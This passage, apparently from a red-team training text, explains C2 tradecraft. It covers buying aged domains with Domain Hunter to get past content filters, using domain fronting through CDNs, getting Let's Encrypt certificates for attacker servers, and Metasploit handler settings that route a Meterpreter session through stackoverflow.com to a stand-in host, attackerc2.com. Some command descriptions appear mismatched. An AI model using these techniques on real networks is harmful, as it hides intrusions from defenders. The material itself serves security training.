Domains

Domain Hunter

Domain Hunter can search for the last 1,000 expired domains

• Domain Hunter can take a domain that you may already have and check it against all the common content filter databases

domainhunter.py –r 1000 # This is without a reputation check

• Domain Hunter can take a keyword that you wish to use and then check it for reputation; return a maximum of 25 results

domainhunter.py –s evilcorp.com

• We can use this to go and acquire a domain with a valid reputation

domainhunter.py –k dog –c –r 25

Flippa

Welcome to Flippa, a website that allows people to build, sell, and buy web properties in the same way that real estate individuals flip homes

Domain Fronting

Another way to hide in regular traffic is to use a controversial technology known as domain fronting. Domain fronting was made popular by the Signal messaging product to avoid censorship in many countries. The idea behind domain fronting is to use the SNI field (Server Name Indication) and DNS fields to send traffic to a legitimate website that may be hosted in a common service provider like Amazon AWS, Google Cloud, Azure, Cloudflare, Fastly, and others. Once the packet is sent to the legitimate service provider's proxy, the proxy headers will be read, and the actual destination of the traffic will be your C2 environment. Over the years, and through abuse, many cloud service providers deprecated support for this. Amazon stated that they never officially supported this feature in CloudFront and has stated that it would violate the AWS EULA. Google, through its Google app engine, has decided to deprecate this altogether. There are, however, other service providers that still support this. The advantage here is that to the content filters and DNS filters, you would be going to a legitimate website, and within the cloud service provider, you would be redirected to the actual location of the server. TLS 1.3 is trying to eliminate SNI as a part of its privacy initiative but its effort to do so is not yet realized.

The following is a decent methodology for finding domain fronting websites.

1. Try and identify websites that are hosted with a target CDN that is both using wildcards and is hosted at the CDN. There are several options for this: http://bit.ly/2ShXpCK, using compiled lists like the one we just provided, or using the Wappalyzer built with option: http://bit.ly/3b63qet.

2. The next step is to register your C2 domain with that cloud service provider—some of them are self- service and some are not. Depending on the service, you may have to engage with a human.

3. Get a valid certificate for your C2 infrastructure; Let's Encrypt is a perfectly good choice.

4. Construct your C2 Payload with a Domain Fronting compatible set of options if they exist.

Meterpreter, though very well understand and discoverable, does support this. LHOST: In this case, this would be a vulnerable website, in our previous example "stackoverflow.com" HttpHostHeader: This is the required field for your attacker server.

Valid Cryptography

How do we give our C2 infrastructure a valid certificate? This is required knowledge for our tradecraft. One option used to be to buy certificates, but today, we can do this in an automated fashion with Certbot. Certbot allows us to get certificates with Let's Encrypt automatically using the ACME protocol. There are very good instructions for almost any web server and almost any operating system. The requirements for Certbot are very straightforward, and most of them are very similar.

Certbot is a Python 3 application, so you must have the Certbot tool installed, and with ubuntu or popular Linux distributions, there are existing repositories that provide this at the Certbot website. The other requirements are on the web server itself:

• Have port 80 opened on your web server.

• Have the attacker DNS name pointing to the web server that is running Certbot.

• Run the actual application and let it put the files that prove the identity of the server.

Once you have a valid certificate, how do you configure Metasploit to use it?

Let's Encrypt certificates live in the /etc/letsencrypt directory, but Metasploit expects .pem file-formatted certificates. Luckily, to build a PEM file, you just need to concatenate the private key and the full chain together. Once you have built this file, you can then build your payload to use it.

If you use exploit/multi/handler, which is the most common handler, you need to set a few options:

set HandlerSSLCert /opt/metasploit-framework/MSF.pem

For domain fronting, you also have to set options that make the handler operate in that manner:

msf5> set LHOST www.stackoverflow.com
msf5> set HttpHostHeader attackerc2.com
msf5> set OverrideRequestHost true

These options above tell the handler that the communication for the payload is sent to stackoverflow.com, which is going to go to Fastly, but the HttpHostHeader is going to be where our actual Metasploit- framework system will live.